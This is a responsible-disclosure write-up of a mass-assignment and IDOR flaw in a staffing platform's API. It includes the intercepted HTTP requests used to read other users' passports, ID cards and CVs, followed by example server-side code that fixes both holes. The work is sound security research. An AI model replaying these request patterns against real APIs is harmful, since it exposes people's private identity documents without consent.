How I managed to find the personal documents of all users due to a misconfigured API
Hey! Today I will show you how I managed to retrieve personal identity documents (passports, ID cards, driver's licenses) belonging to temporary workers of a well-known platform.
Let’s start
First, I went to the Google Play Store and searched for apps owned by the platform. I came across an APK that looked interesting because it had not been updated in a long time :)
So I downloaded the APK, launched Burp Suite and started hacking!
Browsing the APK
I browsed through the APK and discovered a lot of functionality. In particular, I could upload personal documents to my user space to prove my identity. The first thing I did was upload a dummy PDF and log the requests with Burp.
Then, I found this request:
POST /API-DOC-UPLOAD/v2.0/searchDocumentsMetaData HTTP/1.1
Host: api-mobile.redacted.com
Authorization: redacted
Ocp-Apim-Subscription-Key: redacted
Application-Header: redacted
Content-Type: application/json; charset=utf-8
Content-Length: 161
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.10.0
Connection: close
{"requestSearchDocumentMetadata":{"criteria":{"appId":"ESPACE_PERSO","issueDateStart":"","issueDateEnd":"","buId":"65","type":"UPLOAD_WEB"}}}
This request was made while I was reviewing the documents I had uploaded to the platform. While analyzing its response, I noticed an interesting parameter that led to the discovery of an API Mass Assignment vulnerability:
{"responseSearchDocumentsMetadata":{"document":[{"tempGuid":"b5964-...","buId":"65","buIdLabel":"REDACTED","rCreationDate":"2025....","originDocName":"redacted.pdf","edocSubType":"CV","edocType":"redacted","userId":"redacted","issueDate":"","endDate":"","contentSize":0.0,"amount3":null,"workedHours":null}
The userId parameter was very interesting. I tried adding this parameter to the request and resending it:
POST /API-DOC-UPLOAD/v2.0/searchDocumentsMetaData HTTP/1.1
Host: api-mobile.redacted.com
Authorization: redacted
Ocp-Apim-Subscription-Key: redacted
Application-Header: redacted
Content-Type: application/json; charset=utf-8
Content-Length: 161
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.10.0
Connection: close
{"requestSearchDocumentMetadata":{"criteria":{"appId":"ESPACE_PERSO","userId":"redacted","issueDateStart":"","issueDateEnd":"","buId":"65","type":"UPLOAD_WEB"}}}
By changing the userId to another user's ID, I stumbled upon the metadata of files uploaded by other users…
But that wasn’t all, because I now needed to access the file contents. After going through the application’s features again, I unfortunately couldn’t find any way to do it.
Soooo, I went to their website 👉 https://redacted.com, signed up, and started looking for functionalities and more API endpoints.
While testing, I came across a feature that let me view my CV by pressing a button, and I recorded the request that was made:
POST /Api/1/Document/GetByGuid HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: fr-FR,fr;q=0.9
Connection: keep-alive
Content-Length: 88
Cookie: redacted
Host: redacted.com
Origin: redacted.com
Referer: redacted.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
[{"tempGuid":"b5964-...","name":"cv.pdf"}]
Then, I saw the response content:
{"name":"cv.pdf","content":"base64content","type":"application/pdf"}
Using the tempGuid obtained from the first request, I was able to retrieve the file’s Base64 content. I created a second account and successfully accessed all the uploaded documents (CV, ID card, passport, etc.).
I reported this vulnerability to the company and they fixed it the same day.
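As an added example (not the author's or the platform's code; the platform's actual fix is not public), here is the server-side check that closes both holes: the caller's identity comes from the validated token, the search criteria are allowlisted so an injected userId is rejected, and GetByGuid verifies that the tempGuid belongs to the caller. The document store and user ids are constructed.

```python
import base64

# Constructed sample store keyed by tempGuid: two users, one document each.
DOCUMENTS = {
    "guid-aaa": {"tempGuid": "guid-aaa", "userId": "u1", "buId": "65",
                 "originDocName": "cv.pdf", "edocSubType": "CV",
                 "content": b"%PDF-1.4 constructed cv"},
    "guid-bbb": {"tempGuid": "guid-bbb", "userId": "u2", "buId": "65",
                 "originDocName": "passport.pdf", "edocSubType": "ID",
                 "content": b"%PDF-1.4 constructed passport"},
}

# The only criteria a client may send; userId is deliberately not among them.
ALLOWED_CRITERIA = {"appId", "issueDateStart", "issueDateEnd", "buId", "type"}


def search_documents_metadata(session_user_id, body):
    """searchDocumentsMetaData handler. session_user_id is taken from the
    validated Authorization token, never from the request body."""
    criteria = body.get("requestSearchDocumentMetadata", {}).get("criteria", {})
    unknown = set(criteria) - ALLOWED_CRITERIA
    if unknown:
        # Reject mass assignment of fields such as userId instead of binding them.
        return 400, {"error": "unsupported criteria: " + ", ".join(sorted(unknown))}
    docs = [
        {k: v for k, v in d.items() if k != "content"}   # metadata only
        for d in DOCUMENTS.values()
        if d["userId"] == session_user_id                 # owner filter is server-side
        and (not criteria.get("buId") or d["buId"] == criteria["buId"])
    ]
    return 200, {"responseSearchDocumentsMetadata": {"document": docs}}


def get_by_guid(session_user_id, body):
    """Document/GetByGuid handler: a guid resolves only when the document
    belongs to the caller, so a leaked or guessed guid gives no access."""
    out = []
    for item in body:
        doc = DOCUMENTS.get(item.get("tempGuid"))
        if doc is None or doc["userId"] != session_user_id:
            # Same answer for missing and foreign documents: no existence oracle.
            return 404, {"error": "document not found"}
        out.append({"name": doc["originDocName"],
                    "content": base64.b64encode(doc["content"]).decode(),
                    "type": "application/pdf"})
    return 200, out
```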